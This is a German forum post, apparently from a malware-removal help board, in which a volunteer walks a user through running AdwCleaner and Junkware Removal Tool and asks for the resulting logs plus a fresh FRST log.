  • Klicke auf Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
    • "Tracing" Schlüssel löschen
    • Winsock Einstellungen zurücksetzen
    • Proxy Einstellungen zurücksetzen
    • Internet Explorer Richtlinien zurücksetzen
    • Chrome Richtlinien zurücksetzen
    • Stelle sicher, dass alle 5 Optionen wie hier dargestellt, ausgewählt sind
  • Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
  • Klicke nun auf Löschen und bestätige auftretende Hinweise mit Ok.
  • Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).

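Beende bitte Deine Schutzsoftware, um eventuelle Konflikte zu vermeiden. (Schalte sie nach dem Durchlauf des Tools wieder ein, damit der Rechner nicht ungeschützt bleibt.)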
Bitte lade Junkware Removal Tool auf Deinen Desktop

  • Starte das Tool mit Doppelklick. Ab Windows Vista (oder höher) bitte mit Rechtsklick "als Administrator ausführen" starten.
  • Drücke eine beliebige Taste, um das Tool zu starten.
  • Je nach System kann der Scan eine Weile dauern.
  • Wenn das Tool fertig ist wird das Logfile (JRT.txt) auf dem Desktop gespeichert und automatisch geöffnet.
  • Bitte poste den Inhalt der JRT.txt in Deiner nächsten Antwort.


und ein frisches FRST log bitte.
__________________
gruß,
schrauber

Proud Member of UNITE and ASAP since 2009


Keine Hilfestellung via PM!
